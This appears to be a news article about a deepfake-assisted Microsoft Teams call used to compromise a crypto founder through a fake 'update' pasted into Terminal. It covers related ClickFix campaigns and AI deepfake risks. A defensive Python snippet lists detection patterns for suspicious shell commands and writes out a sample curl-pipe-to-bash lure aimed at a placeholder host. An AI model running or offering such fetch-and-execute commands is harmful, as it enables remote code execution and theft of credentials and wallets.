AI scams in crypto approach breaking point

A crypto founder had his laptop compromised when he joined what appeared to be a Microsoft Teams call with Pierre Kaklamanos, a Cardano Foundation contact he had spoken with before.

When “Pierre” reached out about Atrium and sent a Teams invite, nothing looked out of place. On the call, the face and voice matched what he remembered, and two other apparent foundation members were present.

When the call lagged and dropped him, a prompt told him his Teams software was out of date and needed reinstalling through Terminal. He ran the command, then shut the laptop off because the battery was dying, a step that, in retrospect, limited the damage.

He describes himself as “quite technically savvy,” which is part of the point: the attack worked not because the victim was careless, but because the context felt legitimate.

Social engineers have always relied on familiarity, and executing that at scale once required either a compromised account or weeks of text-based rapport-building.

The video call was the authentication layer, the thing victims learned to trust, and replicating it is now within reach.

Fake update

Microsoft documented campaigns in February and March 2026 in which malicious files masqueraded as workplace apps, such as msteams.exe and zoomworkspace.clientsetup.exe, with phishing lures that mimicked legitimate Teams and Zoom meeting workflows.

In a separate warning, Microsoft described “ClickFix”-style prompts targeting macOS users, instructing them to paste commands into Terminal and targeting browser passwords, crypto wallets, cloud credentials, and developer keys.

The fake Teams update fits both patterns simultaneously.
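ClickFix-style lures hinge on getting a user to paste a one-liner into Terminal, typically something that fetches and executes a remote script. As a minimal sketch, the heuristic checker below flags a few patterns common to such lures; the patterns and the `clickfix_red_flags` helper are illustrative assumptions for this article, not an exhaustive or production detector.

```python
import re

# Illustrative red flags commonly seen in "ClickFix"-style paste-and-run lures.
# These patterns are assumptions for demonstration, not a complete ruleset.
RED_FLAGS = [
    (r"curl\s+[^|]*\|\s*(ba)?sh", "pipes a remote script straight into a shell"),
    (r"base64\s+(-d|--decode)", "decodes an obfuscated payload"),
    (r"osascript", "runs AppleScript, often abused to prompt for passwords"),
    (r"chmod\s+\+x", "marks a freshly downloaded file executable"),
    (r"\bsudo\b", "asks for administrator privileges"),
]

def clickfix_red_flags(command: str) -> list[str]:
    """Return human-readable warnings for suspicious patterns in a pasted command."""
    return [reason for pattern, reason in RED_FLAGS if re.search(pattern, command)]

# A lure shaped like the fake "Teams update" described above (hypothetical URL).
lure = "curl -fsSL https://example.invalid/teams-update.sh | bash"
for warning in clickfix_red_flags(lure):
    print("warning:", warning)
```

The point of the sketch is the shape of the lure, not the detector: a legitimate app update never asks a user to pipe a URL into a shell, so that single pattern alone is a strong stop signal.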

Google Cloud’s Mandiant unit described a crypto-focused intrusion built on the same structure: a compromised Telegram account, a spoofed Zoom meeting, what witnesses described as a deepfake-style executive video, and troubleshooting commands that launched the infection.

Mandiant said it could not independently verify which AI model, if any, generated the video, but confirmed the group used fake meetings and AI tools during social engineering.

On Apr. 24, the real Pierre Kaklamanos posted on X saying his Telegram had been hacked and that someone was impersonating him, along with “a few other people in the industry this week.”

He told followers to avoid clicking links or booking meetings through the account and to verify contact through LinkedIn direct messages.

By then, the founder had already messaged the account suggesting they switch to Google Meet. Whoever controlled Pierre’s Telegram account replied that he had gotten busy and asked to reschedule, evidence that the attacker was still managing the persona after the call ended.

That exchange turns the incident from an isolated embarrassment into a signal of a live campaign: the method is active, the account compromise is the entry point, and the relationship history is the weapon.

| Stage | What the victim saw | Why it looked legitimate | What the attacker was likely trying to achieve |
| --- | --- | --- | --- |
| Initial outreach | “Pierre” reached out about Atrium and suggested a call | The victim had spoken with Pierre before, including on video | Reopen an existing trust relationship instead of starting from a cold approach |
| Meeting setup | A Microsoft Teams invite for the next day | Teams is a normal business workflow and the topic was plausible | Move the target into a controlled environment that felt routine |
| Live call | Familiar face, familiar voice, plus two other apparent Cardano Foundation members | The social context matched the victim’s memory of prior interactions | Lower suspicion and make the call itself feel like verification |
| Call disruption | Lagging, instability, then getting kicked out | Technical glitches are common in video calls | Create frustration and set up the fake “fix” as a normal troubleshooting step |
| Fake update prompt | A message saying Teams was out of date and needed reinstalling through Terminal | Software update prompts are familiar, and the user rarely used Teams | Get the victim to execute a malicious command directly |
| Command execution | The victim ran the command, then shut down the laptop because the battery was dying | The workflow still felt like a routine app fix at that moment | Launch the infection chain and gain access to credentials or device data |
| Post-call follow-up | The victim suggested switching to Google Meet; the attacker said he got busy and asked to reschedule | The persona continued behaving like a real contact after the failed attempt | Keep the relationship alive for another attempt and avoid immediate suspicion |

Why generative media changes the threat surface

The founder said he now believes the call may have involved AI-generated or manipulated video. There is no forensic confirmation of which tools were used, but OpenAI’s own safety documentation acknowledges the underlying capability.

OpenAI launched its 4o image generation model on Mar. 25, describing it as capable of “precise, accurate, photorealistic outputs,” and released the ChatGPT Images 2.0 System Card on Apr. 21.

The firm stated that the model’s “heightened realism” could, absent safeguards, enable more convincing deepfakes of real people, places, or events. One of the leading AI labs has now put on record that its own image model raises the ceiling on what a convincing fake can look like.

The World Economic Forum said in January 2026 that generative AI lowers the barrier to phishing while raising its credibility, through realistic deepfake audio and video that can evade both detection systems and human scrutiny.

INTERPOL declared financial fraud one of the world’s most severe and rapidly evolving transnational crimes in March 2026, identifying deepfake videos, audio, and chatbots as tools that make impersonation of trusted people easier to carry out at scale.
